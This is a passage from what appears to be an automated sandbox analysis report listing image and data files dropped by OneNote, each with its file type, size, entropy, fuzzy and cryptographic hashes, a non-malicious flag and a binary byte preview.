                                                                                                                                                                                                              SHA-256:5B321A4D81BD499B289B1755F6450A42047C494DFBC112DBD56DA4CED2C15C1A
                                                                                                                                                                                                              SHA-512:C32DD26047F6B8AA061085B38AC2B8335868E1BFD8731DB65544309223A955FA4BF45B06AC8D244408658F51A1775B6F19FF0FFC804989DE706DE8EB36F1436F
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d............................................................................................!.1..AQa..q..".........2...BR#b.r.3...$.'...)..C%7gw..(.S.W89.......................!1.A.Qa.q".....2...#....B.t......rc.$%67Rb3s&'CUu.v....S.d5.V4T.e.............?...?..Wj.e.e.......w/..E..eOw_.....6......u..C6h.,..;.g.D8Z..-)O..jy..e;.u.g..w..[.L""k'w.......'1'.[......=..P...S.9a.V./O....q=8xk]...........9......F...e9'....9.O.... .&.....p......c.4...mr...?.......L..'.....0....+..|_...POM=7.?.2.a....};.Z..y./....>./.C.<...;.....|.1>...........S.8.o.O...+..n2...k../.X..9...Y...:.....\...Dk......q.K..\.Wuh.!Z?.mu...R.5.A.S.h.0..[..v..+M.....aUi*.k..?#..._...X..R.&]..[..;../]L..f..V......*.e...ut&.#.J.5....c%..o.$..v.<K.6..T.IP.....6X.*.uf..t0^..-.)m$.!.q(.j.f;..WB6.b.B..R.
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):4.314848547950657
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:gsi+3RfIFUjU0oEdlXdG9y3gRM7ECPJ483ujWgy8:gstfIFSdlXE9UgRM7hx42
                                                                                                                                                                                                              MD5:CB5BE6B3EF33D72D785AF5048181163E
                                                                                                                                                                                                              SHA1:EE0001CF2A8F6B476D3DBC54881B83174172D58A
                                                                                                                                                                                                              SHA-256:7B672DA0FFADFA5FAC3FF654EF6B722DEA7DF31D6B5E959CDCD89FCC2CDF15EB
                                                                                                                                                                                                              SHA-512:539ADE0CC3DF10FCBBAEACACADF9BBFD8EC61FD61676F3117A1046770863F2225B9BB254111689D07341CA90F8381BDA35F337FDBC692EAC519FA3E84D9BB601
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>.......R...v...F...................................................................................................................................2...>...........v...z............................I.......I.qk..B.....LZk.......k..J..[...;*...{k..J..[...;*...{k....I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'..............>J.zo........W.....N...^................|..!-,J..C.^.~.........f........................................I.qk..B.....LZ.............>J.zo........W..........>J.zo........W..........k.......k.......k...........................................k..j....k..T.]..k.......k....B..k..H....k....B..k....>.)k....J...................;........4...4...4.."..............k...k...k....z...y.. x.. ...........$........4...,..7,..7........................;........4...4...4.........k.......k......#k..............................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:06:24], progressive, precision 8, 38x792, components 3
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):22203
                                                                                                                                                                                                              Entropy (8bit):6.977175130747846
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:5q3R1VBvq3R1Flrk6Q0QPJJrR39joOVMJ25d1NkMhIwobbtAAAqYnLJZMJYZ2AC:xw6Q0WJR3FoOVMJIIlAAAqYnMJdD
                                                                                                                                                                                                              MD5:2D3128554F6286809B2C8E99DE5FD3F6
                                                                                                                                                                                                              SHA1:FC42CB04151D36F448093BDEFE33031A9B8D797D
                                                                                                                                                                                                              SHA-256:14FA2D16310485AA1CE41F6D774A3D637E8CF8B03C4F72990155DF274FDB6BD9
                                                                                                                                                                                                              SHA-512:D8531247A6E89ECABEA9C4A78F596CCE3493334EDF71AE4F7998FDDD0F80705948609C89756AB56FDFAB6D04DEC5F699A693801A772CA2EE2465BDD2CE5D2D5A
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:......JFIF.....H.H.....XExif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop 7.0.2004:03:04 13:06:24............................&.........................................................(.....................&...........*.......H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d......................................................................................................................................................"................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?...H.....Go.Kxn.b..g...........%?_....O......q......7G......%%.V..8zm.].v?...jJ~._..>.......O;........o..rI.A.....n.a.........
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):4.44726255611341
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:aesbII06kT7uuHcMtti6vE15L7RXlp9zwEUFpytrdMruUm4FX/DUKrkNkT3LejPB:aesq3HcMfEDZXz9z2FgRMPLIY
                                                                                                                                                                                                              MD5:71CA01AD96DD60E711C6D38CD4388EB6
                                                                                                                                                                                                              SHA1:91C0ACF14027A1CB686199F624A3637C3AA619B6
                                                                                                                                                                                                              SHA-256:43665DA40C64B9F24A5696AFA69BDB4F1CF32CBE8F612B7CBB0B7227C90A0440
                                                                                                                                                                                                              SHA-512:0055EFEE408B9354B0E7AB44ECE01F820FDB6DB093CD5CBB8BF3FFA020E097708BB03C02AFE19F56571AD05949E4C441439525ECC59CD01DDD4549DE29608690
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>.......l...v...`...................................................................................................................................2...>...H.......v................................I.......I.qk..B.....LZ..d.......d......!....d......!....d..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'...............e}..n......%......N...^...............~(..wm.M....\..........f........................................I.qk..B.....LZ..............e}..n......%............e}..n......%.............d.......d.......d...........................................dj......dT.]....d.......d..B....dH......d..B....d..>.)..d..J...................;........4...4...4.."................d...d...d..z...y.. x.. ...........$........4...,..7,..7........................;........4...4...4...........d.......d....#..d............................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):15740
                                                                                                                                                                                                              Entropy (8bit):6.0674556182683945
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:Elv3GG8/OOs+GouFdxMlxjoPyerzkpuOo2vPMc62PaJseZC+BJoS/:EtNiwdxMlZoPhzkpuOo2PMc6rX8+B6+
                                                                                                                                                                                                              MD5:FFA5EC40DC9A0FD10EB9E6355142D6A6
                                                                                                                                                                                                              SHA1:3D3D6A7E086B3C610C08F1F3E3F883604F06F2A4
                                                                                                                                                                                                              SHA-256:D74C3973C8D1F7C77274691AFB1AA934940674341D7EEE563BE75E563281BDFD
                                                                                                                                                                                                              SHA-512:6FAF2A24D06E6008F3579C7CEC90C2887462BDF83FAD7372FBB74B8DE90340B580E9836F309B68A9794597A598F7DCDA661C9A58DA6D8187C69083B7A17C9CD9
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d.........................................................................................!.1.....AQ..aq.g..8...."r....2.FG..#.E..7.Rb..Cc..D.v.B..3s..$d.%5Uu..&6fW'w........................!....1Aa...d..5e.6.q...Q..."2b.c..r3DE..BRs4U.#C.S.T............?...u.&0...cV.T.I...1..=4....Ce_.g.q.=F.M:>)...k..pm..h..=........S....)Ja8x...b.).=5.q..0......k.M.....1?-.G.b&.5..Ep.8t...'...R)..ta.F$bXO]tW.b.6#.t.XWN..ZW......].....G....x&&f..'L.....7...\...'.8...~`.sa...............................................X........qo...SMk...'.V...i..hb.}&?/.k.:>l.^....>Y...<}...&.jY.Gn.MKejyV......D......gf.0....t.nw..XQ...H.B.....=8.UkR.....Hm..w..]...k...#Z...F../.gjWvf.....w.aZ].2..5..^...VZv..._.7..a.|...:.B...,f...............~....m.;_.....-.e.y.w.[m.].bu.b.f+.E++\.....Y..7
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):4.311272024431886
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:5fkBsUcfcAZEe6tQuDcEAkL6EjPXI5mL9hUspyFrdMrEkhwZFXszxzt5p:qs6AWN6jEjXPXH9isARMEkh4O5
                                                                                                                                                                                                              MD5:2E7A210596BB789E6E824D6F294FBA5E
                                                                                                                                                                                                              SHA1:92975870337C75AD3E18C4BC0574B20CF714D159
                                                                                                                                                                                                              SHA-256:3EF33447F32DBC0A2A7500811331BB3890322DD3B05A7A56548A58AE9D63E90D
                                                                                                                                                                                                              SHA-512:A60F7C4E920CE5F09E249E0FD9FBACB3A131ABB9DD4DA1072451E10B9E87719CA0EB0A96C5DA5333D060AA4A196BE1ABF51D95B96B53B6CD2F546524BB42075B
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>.......N...v...B...................................................................................................................................2...>...*.......v...v............................I.......I.qk..B.....LZ..#.......#i$...%...*.)...#i$...%...*.)...#..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'..............O.$.....:........N...^................5t...B.u.....z........f........................................I.qk..B.....LZ.............O.$.....:.............O.$.....:...............#.......#.......#...........................................#j......#T.]....#.......#..B....#H......#..B....#..>.)..#..J...................;........4...4...4.."................#...#...#..z...y.. x.. ...........$........4...,..7,..7........................;........4...4...4...........#.......#....#..#............................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):86187
                                                                                                                                                                                                              Entropy (8bit):7.951356272886186
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:1536:AbmHwD7za0syWMetp3TdPFzoJamVdAQZCiUit9qbYN6LerhWMzIWgN1EeaYhJM:1QnzsyTeP3TPAdAQZCi5qbYEKrhWWMNO
                                                                                                                                                                                                              MD5:FEE4785DF76E93A9DC2F4501CBAEAE12
                                                                                                                                                                                                              SHA1:8FB4527BDE05EF208FCDB168098A07707C27501F
                                                                                                                                                                                                              SHA-256:F091DED5E283AF6848670A3172E7C43C6099875D39B3FC69C2BDBA914F609602
                                                                                                                                                                                                              SHA-512:7E99D33151A0D3873D6A819C98EA8E62D928C087B7BA2080F11C7BCF746AD60A44D4FF6EE3D2D2E8DFA4BF1FC6285ED56BB83F91C2FC6FC4FDFF2000105F10B1
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d...........................................................................................1.!Aq...Qa."...2..BR#...br......6v.7..3.CSc...$4.s..&dt%u.f.......................!1.AQ..aq........"2.B#....Rb3..t.5u.67.8.r..$....C4.cs.Sd%.DEUe&.............?............w.....c.....i.A.....3...7.......7..P......%.........?Th..l./?.;.....$}..=5Oa...F.c.A/...D.D..]..y..3e.5\%.fo2.X.*]q.5Ee.}..i..md.T....#...-...Mu...9...-+..~w5O.);..G..'.;..).....A_...M.vV..y.q......,<.3.(...._K:..XM.......w.......9..T.......?b..a-%.c;.}..>....|.,lZKCEB.t...fw|.Sw^..Y..:.J.................t._P..v..j.1.R8.R....G..W*H<(Xi........i..xcu...WM.dqM>'W..g....M.q.....+.....b'..~....>..T.~Jc....fj.X.x..9...N.w.6:..>.......&.(h..u...t._...)_k#7Za...cZ....P...Y..;.V.,..xo.....f........Y...\6...M'L._
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):4.694291310839355
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:eGSsIxVfsrOSKWtXYzBEdzbULCBhrVXDI91UcpylrdMrGU9KFXQ18AAtBj:Us+WOfW5YlEtUUJVXDI9Gc4RMFoCnwx
                                                                                                                                                                                                              MD5:446AD8EB166DD1592D7CA0F9B67043CC
                                                                                                                                                                                                              SHA1:3C6B2A053D94CB2F44FEAD4FCD9ECAF2C69DF4CB
                                                                                                                                                                                                              SHA-256:D7996667BAABDF8D8AB213A9C6CBB88A7DBFF44E0B2485DD46DD4E3145D1FE1E
                                                                                                                                                                                                              SHA-512:458939CF5CF26446D6429EFD4B54E2908C26E7F0CFBDECDB5515EBBC980CEA9D5B6B67778A8A4B077BB5A4ADA8B5ACC8D438762E515323154D96C57590042772
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>...........v.......................................................................................................................................2...>...t.......v................................I.......I.qk..B.....LZ#`......#`...~..6.p.S...#`...~..6.p.S...#`...I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.............hh..(...;.d".~.....N...^................N...&.H.g.....y........f...................................H....I.qk..B.....LZ............hh..(...;.d".~.........hh..(...;.d".~..........#`......#`......#`..........................................#`.j....#`.T.]..#`......#`..B..#`.H....#`...B..#`...>.)#`...J...................;........4...4...4.."..............#`..#`..#`...z...y.. x.. ...........$........4...,..7,..7........................;........4...4...4.........#`......#`.....##`.............................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:PNG image data, 85 x 470, 8-bit colormap, non-interlaced
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):11197
                                                                                                                                                                                                              Entropy (8bit):7.975073010774664
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:p9wNdtRKcVHso6zsqm06xaqZdingVzLZ7/PGSIz/yycRTbChh/JzhbEx15RGb:mdtMcVHqgAqTinMzLZ7/uSIz/yTR/mhF
                                                                                                                                                                                                              MD5:DDC3CC30794277500EFE4BC6667EC123
                                                                                                                                                                                                              SHA1:EFC9642C1F95B5FC38764476AE481649C016FA0C
                                                                                                                                                                                                              SHA-256:7F5B660A1A0BF46C75AAF19B4F77A0E086DE003EC03AFC1F58D871D55AA5BA9E
                                                                                                                                                                                                              SHA-512:25232A84604C3959634D33090238FEC8D51E40AD84EB3A08BB8522A81BE1E83378649C014E98E1DFCDF46B7BFAC92D8D2429211CD11D7EE0334C9C3DF7C1B6A6
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:.PNG........IHDR...U.........1x5.....PLTE....................................e........................................................s...............x..........................o..............................................................................................................................................................~.............................m...............................................j...............................................p.......z......................................................x..............|........................................v.......................y..........................................................h...........................................................................P..{....bKGD....H....cmPPJCmp0712....H.s...(SIDATx^.}i@S..N....h...!..)....AI%..p.L."a..)..`U..,h..:O.b.:.j+.Z).b..zN.s..{O...&|..N}...${....~.....k}.[k}{.o^.D_..W:35ly..7rL....6n0.A...b
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):4.329370358995182
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:HGxs6iaFAy+AVdCZRtFkElLEIX069fNUZyzxpyFrdMr2anV8FXUoGmAyMeSgnWPf:mxspFArCZREElJXn92ZyVYRMXnaqCct
                                                                                                                                                                                                              MD5:55C1B91F9554AFF3FE53E1390C610967
                                                                                                                                                                                                              SHA1:0A895B740632454D782E41F653E412E42299DC87
                                                                                                                                                                                                              SHA-256:80F9EC7200962645AA14B1DE7F5E1B7182ACAE90E9D51EFBCBF79D9FA50C61DF
                                                                                                                                                                                                              SHA-512:B9B6BA3475EE3AB7C46C74C44039D04A9040112937E53C5B52514E5D73F5A2960631583AD7CA1C09FE92A150946F6882D5B7CBD78EC487C590EE22DD369C286B
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>.......N...v...B...................................................................................................................................2...>...*.......v...v............................I.......I.qk..B.....LZ.Y.......Y... ..7W...5.;.Y... ..7W...5.;.Y...I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'..............0g..K.7..~.......N...^...............t.3...D..XF............f........................................I.qk..B.....LZ.............0g..K.7..~............0g..K.7..~.............Y.......Y.......Y...........................................Y.j.....Y.T.]...Y.......Y...B...Y.H.....Y...B...Y...>.).Y...J...................;........4...4...4.."...............Y...Y...Y...z...y.. x.. ...........$........4...,..7,..7........................;........4...4...4..........Y.......Y.....#.Y.............................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:PNG image data, 88 x 574, 8-bit colormap, non-interlaced
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):19920
                                                                                                                                                                                                              Entropy (8bit):7.987696084459766
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:DRSgtAxJx7bzvAsVSqQElOT4uHmpmvNYT9aPU+QtsC2LgfIqJZnbeyRB:DsgaN7bzvAsVdK4uGQFUZ6bU/p3
                                                                                                                                                                                                              MD5:1BDAD9B3B6DE549162F9567697389E1C
                                                                                                                                                                                                              SHA1:5D9C09159F07A3A9BDCC6C4B9BD9CB72D0184E6F
                                                                                                                                                                                                              SHA-256:0908A4CFA23F93011176D47F45843E9CA2973030421996E8E27484781F54B0EC
                                                                                                                                                                                                              SHA-512:475040779AC247BB5C3E11862FB55FBDDFA12D759EE86A33E11BC1F3B656D6CD0F9B25146C0113E43E1D8001D8867D3BC3BF7E6FE21F3A0016CB1F8B70B7A15A
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:.PNG........IHDR...X...>......y=h....PLTE..................................t........iw..............................................._n|...Tds...ky......................................................p~.....................................................dr.................v.............................................n{.......ap}..........x.....z...................u......................|..Vfu............r.....w........................................~...................Zjx...................................Yiw............w..|....................Xgv{.....y...........................jx..............\lz.........}..z.....t..[ky........u..y.....gu................................{..........}.....u....................~...........y....r.....bKGD....H....cmPPJCmp0712....H.s...JfIDATx^...\.W./.}....Sy...(..4....D.-.....H...% .$"D.Qr.......`..;...6...N......s...^...L.....Y{.GQU`..~...j....{...-Ax.K..&.....F..I\i..
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):8192
                                                                                                                                                                                                              Entropy (8bit):2.915002931140403
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:xsZr+TDj2US7bTDE1BN0fMX3aTz9JygRMHTET2c+/IbVl:xsGPI3w1BN0EX8z9JygRMe2
                                                                                                                                                                                                              MD5:60126AEC06DB5DF5C97D76EDB2206426
                                                                                                                                                                                                              SHA1:526944BF9EFAE61F634C3496CD6E850CAFB725AC
                                                                                                                                                                                                              SHA-256:EB32EB0CE2AABE1861C9E0FD5A67E67FC5B51EAA4BD3BFF7C7042D006C48B1C9
                                                                                                                                                                                                              SHA-512:D4107F814941D30B9CC0F2C2168E18CC4D744A3598227765389D0BA668F9C35170042D8CB9DCA0A653BF0AE9E31F0B84761AC18C45FD5A225F443610DE7899E7
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>...........v.......................................................................................................................................2...>.......H...v................................I.......I.qk..B.....LZ.V$......V$... .2.(.A....V$... .2.(.A....V$..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'................E"Z..Sl..N@.....N...^................l.-/.CM.G.{. .3........f........................................I.qk..B.....LZ...............E"Z..Sl..N@............E"Z..Sl..N@...........V$......V$......V$..........................................V$j.....V$T.]...V$......V$..B...V$H.....V$..B...V$..>.).V$..J...................;........4...4...4.."...............V$..V$..V$..z...y.. x.. ...........$........4...,..7,..7........................;........4...4...4..........V$......V$....#.V$............................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):179460
                                                                                                                                                                                                              Entropy (8bit):7.979020171518325
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3072:oiKXvL7lv0am/R1vrdH+9dK6zPQ6bbnGDpcGGDNMIOIMAT8q9Vc02Q57S4A+vMFz:+vlvC/HvgA6fGqGGJlO1qZ71W6CzDn
                                                                                                                                                                                                              MD5:4E131DBFEC5C2462273CA7B35675B9D9
                                                                                                                                                                                                              SHA1:CA037F444D819A118AC37D7AA3782B9BF94C1616
                                                                                                                                                                                                              SHA-256:2A4A3530D652E227DDD5ADC096A95F6034718F7C380B07DB622022D768815059
                                                                                                                                                                                                              SHA-512:C333ECEB1439D0238BF44FB7896E62DBA4C645B70413AA0F99C1F10E8DCD20C2EEE5C83F2E9DDE9A2494C85A6D8D13CFFFC4160E2F598E17867015F5244D656A
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d.............................................................................................!.1AQ.aq...".....2Rr..Bb..#34.....CSs.$5c.t....%.Dd.6.T..u.U....E.7w........................!.1A.Qaq......2."r.3....BRb.#4......CsSc...$.5..%.DT.t67d..Uu...'............?..c.......p..z..i.....z......kj........F>f......3N...M....RM.&..-.~.Q..'.....q.a..w...-~......g.{..&.......V.n.D....>FS!n.....@..)...W..q..Wr{..J.gf.{.M$.P@m.,..9..&m.D...w.._...-.O........s.....h.k~......(.K...V..l.-...+.9.k......*......#.p#.O..9M..mF...C.......7+.AI....4vw.;..H......e..Q.u[.eUK.....z.....[.Kt...s..Lf.4..l{.....sh.............=..;..iqkj.m.a...NH......v..H..$..q.y......c...U[Mcf.......+...S-...^....4..T..YtL.x.v.;.....<...Ik|B.$.s8......3.+.8.l.. h.:....%B..W..I.QRS..,*x.
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):4.334340660958833
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:qsASxS4it7uE40ViXN1h9ZsApyTlrdMrnBZFXIxoAEovg:qsZS4iUEKXvh9ZR8RMBZaW0
                                                                                                                                                                                                              MD5:49A7935F6FD7F0B14901A4766397DBCE
                                                                                                                                                                                                              SHA1:FF5BE3F5BC2DC5AF4AA13826E97B2F6536E3C99A
                                                                                                                                                                                                              SHA-256:C161B9EC1AE699BAC4824C266AF8DAA9BFD59485B5ABB9292796D7EF923BDFB9
                                                                                                                                                                                                              SHA-512:DCDBB09BFDD94ED462A7D71A6523BEB36E843D16B9840E0A621963E21595888DC1D539007609F233C1F4F24DAA1D7B783D5213F5C287D4F05A0FF7E11039A716
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>.......T...v...H...................................................................................................................................2...>...0.......v...|............................I.......I.qk..B.....LZ.......P6".......|...P6".......|.....I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.............v...2.i..;vN...R....N...^.................L...UC......z\........f........................................I.qk..B.....LZ............v...2.i..;vN...R........v...2.i..;vN...R................................................................j.....T.]...........B...H.......B.....>.)...J...................;........4...4...4..".....................z...y.. x.. ...........$........4...,..7,..7........................;........4...4...4....................#.............................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):109698
                                                                                                                                                                                                              Entropy (8bit):7.954100577911302
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3072:rDlmvIWr0aRtNCfShCWBxyCHMlcVG0Ezy4FR:rDliIfot8ahCWBcCHDVwR
                                                                                                                                                                                                              MD5:8D804A60E86627383BED6280ED62F1CF
                                                                                                                                                                                                              SHA1:E23FF14B10AD0762DD67FBA3CD6EFC85647C0384
                                                                                                                                                                                                              SHA-256:494547E566FB7A63DD429EB0699FE41AA8998F8EA2F758D813FE3D56C3075719
                                                                                                                                                                                                              SHA-512:0FB19F3D00159F2748C3A54E952E551B9FEA6910D67A54DECA8D099992E50383EADB92768FF1F75CFFAE82A7A157B1E0F77A2F0BE7EC64FD2324304FDCA46577
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d...............................................................................................!"#.123..AQB$..aq.RCS...b..c4%..rs..D&....5E6'..TdUte...u.....FV...7.......................!"..1A2B..QaqR.#.br3.........C%...$5.....c4U..Eeu&SsD.6T..................?.....O.C.....^..R<A.g...[....3.....r.0.....nX.S....}...[.?Z.....A.?..~~I..rY|N.o...9......!...o7r../-.y...'5.3.U.s".-.0.1......SS...&.Q.j.*.$m.e..:x....`}...EP.?.7..~G(so.......O.....z.N..<....~^a.e...........p9.?<._..|......~.<@.D.9..G..?.?z.y?z.C.U.w..[.,..A.+........s......g...G.^....pz.xY.....d8.y.X...P..O(A.O..~:._.......<...o..4s..^.^b..x......_a.....|{c...:..X.....}.._...[?..NK.c...}.<......H.G....+x.Z..|....n...o....`.nk.#.%x......-|...|7......N!=././..w.8x.".8....'x........w...,>....j[w8a..}..lS..?.
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):4.343007484523903
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:zh8s/L/UlbEc43EGXD9h1sRMheJ/efW8Tu:zh8s6ELUGXD9h1sRMh1
                                                                                                                                                                                                              MD5:405668A4E3524653DC93B1D1A8161F50
                                                                                                                                                                                                              SHA1:EDE494192ED25196EFEF6683D135F68D8FB07470
                                                                                                                                                                                                              SHA-256:4ECA3ECD9AA7DC2CCB24C0E0CC5D56F0AFC9A9527C385883BF818AEF5CADDFC6
                                                                                                                                                                                                              SHA-512:068FFA47496991C230626EF16832AC46BBC3500026CDC0384ADEAE9F0FCB1D609EF5ABA3F34774017345C391080296B0071896F87A57311866B958B6DB35C29C
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>.......N...v...B...................................................................................................................................2...>...*.......v...v............................I.......I.qk..B.....LZ...........}B.D......<....}B.D......<......I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.............*V..`..............N...^..................<.8!I./& ...........f........................................I.qk..B.....LZ............*V..`..................*V..`..................................................................................j.......T.]..............B.....H.........B.......>.).....J...................;........4...4...4.."...........................z...y.. x.. ...........$........4...,..7,..7........................;........4...4...4........................#...............................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):41893
                                                                                                                                                                                                              Entropy (8bit):7.52654558351485
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:768:pZvVQkUbOHxx3pvVmO5rsP5gUdXwFMuv53knzyncaXgRDqPU:pZkijV5wScXwFMYknzucaXgRyU
                                                                                                                                                                                                              MD5:F25427EFECFEE786D5A9F630726DD140
                                                                                                                                                                                                              SHA1:BC612A86FF985AB569ED1A1EA5FFC4FDB18FC605
                                                                                                                                                                                                              SHA-256:5A36960DF32817E8426BD40A88F88B04FB55B84BAEF60F1E71E0872217FDB134
                                                                                                                                                                                                              SHA-512:B102F34385196D630F198667E874F25ADBC737426FDAE0747EC799B33632E5DC92999C7C715DC84D904342738930267AB1709870BDAA842243E4C283FE5E1554
                                                                                                                                                                                                              Malicious:false
